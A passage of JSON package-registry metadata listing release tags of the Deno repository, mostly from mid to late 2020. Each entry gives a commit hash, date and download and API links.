","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.m